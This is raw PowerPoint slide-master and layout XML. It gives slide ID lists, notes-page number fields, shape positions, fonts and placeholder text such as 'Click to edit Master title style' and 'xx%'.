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 id="2147483861" r:id="rId2"/>
    <p:sldMasterId id="2147483863" r:id="rId3"/>
    <p:sldMasterId id="2147483865" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId49"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="271" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="270" r:id="rId16"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="273" r:id="rId18"/>
    <p:sldId id="281" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
    <p:sldId id="277" r:id="rId21"/>
    <p:sldId id="278" r:id="rId22"/>
    <p:sldId id="279" r:id="rId23"/>
    <p:sldId id="282" r:id="rId24"/>
    <p:sldId id="275" r:id="rId25"/>
    <p:sldId id="288" r:id="rId26"/>
    <p:sldId id="284" r:id="rId27"/>
    <p:sldId id="289" r:id="rId28"/>
    <p:sldId id="290" r:id="rId29"/>
    <p:sldId id="291" r:id="rId30"/>
    <p:sldId id="292" r:id="rId31"/>
    <p:sldId id="293" r:id="rId32"/>
    <p:sldId id="294" r:id="rId33"/>
    <p:sldId id="295" r:id="rId34"/>
    <p:sldId id="287" r:id="rId35"/>
    <p:sldId id="296" r:id="rId36"/>
    <p:sldId id="302" r:id="rId37"/>
    <p:sldId id="298" r:id="rId38"/>
    <p:sldId id="299" r:id="rId39"/>
    <p:sldId id="300" r:id="rId40"/>
    <p:sldId id="303" r:id="rId41"/>
    <p:sldId id="301" r:id="rId42"/>
    <p:sldId id="305" r:id="rId43"/>
    <p:sldId id="304" r:id="rId44"/>
    <p:sldId id="297" r:id="rId45"/>
    <p:sldId id="306" r:id="rId46"/>
    <p:sldId id="307" r:id="rId47"/>
    <p:sldId id="308" r:id="rId4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39" autoAdjust="0"/>
    <p:restoredTop sz="93002" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="145" d="100"/>
          <a:sy n="145" d="100"/>
        </p:scale>
        <p:origin x="246" y="-8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1C768E-3D5C-4BA5-840E-D1997D652471}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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9A6E48-E99A-40F0-9AF5-963708835407}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3832579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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3111837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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="754994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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2827341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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2728783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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1312573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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2699267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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2758492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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1732452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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1787236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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2480704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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1632219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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1534626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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3039156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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1636966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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190924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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362739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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="645480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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3785822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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30051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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2198671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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2999706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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="430334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A6E48-E99A-40F0-9AF5-963708835407}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169008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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4716833" y="949300"/>
            <a:ext cx="9380800" cy="43696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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1673367"/>
            <a:ext cx="5763600" cy="5188000"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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flipH="1">
            <a:off x="1378933" y="0"/>
            <a:ext cx="14490400" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 4985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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074333" y="2931567"/>
            <a:ext cx="5763600" cy="20112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4700"/>
              <a:buFont typeface="Julius Sans One"/>
              <a:buNone/>
              <a:defRPr sz="5333" b="1">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8000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;13;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5732333" y="5539167"/>
            <a:ext cx="5105600" cy="331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800"/>
              <a:buFont typeface="Questrial"/>
              <a:buNone/>
              <a:defRPr sz="1867">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3733">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3733">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3733">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3733">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3733">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3733">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3733">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3733">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Questrial"/>
                <a:ea typeface="Questrial"/>
                <a:cs typeface="Questrial"/>
                <a:sym typeface="Questrial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215768643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5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;54;p11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-26500" y="-25767"/>
            <a:ext cx="12270800" cy="68836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11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951000" y="851733"/>
            <a:ext cx="10290000" cy="2618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9000"/>
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9000"/>
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9000"/>
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9000"/>
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9000"/>
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9000"/>
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9000"/>
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9000"/>
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9000"/>
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Google Shape;56;p11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951000" y="3608501"/>
            <a:ext cx="10290000" cy="5976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1219170" lvl="1" indent="-423323" algn="ctr">
              <a:spcBef>
                <a:spcPts val="2133"/>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828754" lvl="2" indent="-423323" algn="ctr">
              <a:spcBef>
                <a:spcPts val="2133"/>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2438339" lvl="3" indent="-423323" algn="ctr">
              <a:spcBef>
                <a:spcPts val="2133"/>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3047924" lvl="4" indent="-423323" algn="ctr">
              <a:spcBef>
                <a:spcPts val="2133"/>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3657509" lvl="5" indent="-423323" algn="ctr">
              <a:spcBef>
                <a:spcPts val="2133"/>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4267093" lvl="6" indent="-423323" algn="ctr">
              <a:spcBef>
                <a:spcPts val="2133"/>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4876678" lvl="7" indent="-423323" algn="ctr">
              <a:spcBef>
                <a:spcPts val="2133"/>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5486263" lvl="8" indent="-423323" algn="ctr">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387142815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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300310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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 58"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;59;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-225733" y="-86000"/>
            <a:ext cx="5934800" cy="7029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60" name="Google Shape;60;p13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-2139567" y="2165800"/>
            <a:ext cx="6426400" cy="5892800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Google Shape;61;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587533" y="2510967"/>
            <a:ext cx="4258400" cy="43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62" name="Google Shape;62;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6414361" y="1552091"/>
            <a:ext cx="912800" cy="387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t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;63;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6414361" y="2709320"/>
            <a:ext cx="912800" cy="387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t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Google Shape;64;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587533" y="4837700"/>
            <a:ext cx="4258400" cy="43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65" name="Google Shape;65;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587533" y="1392000"/>
            <a:ext cx="4258400" cy="43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66" name="Google Shape;66;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587533" y="3680467"/>
            <a:ext cx="4258400" cy="43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67" name="Google Shape;67;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="7" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6414361" y="3840557"/>
            <a:ext cx="912800" cy="387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t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="8" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6414361" y="4997787"/>
            <a:ext cx="912800" cy="387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t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587533" y="1759393"/>
            <a:ext cx="3272000" cy="3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70" name="Google Shape;70;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587533" y="4060560"/>
            <a:ext cx="3272000" cy="3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71" name="Google Shape;71;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
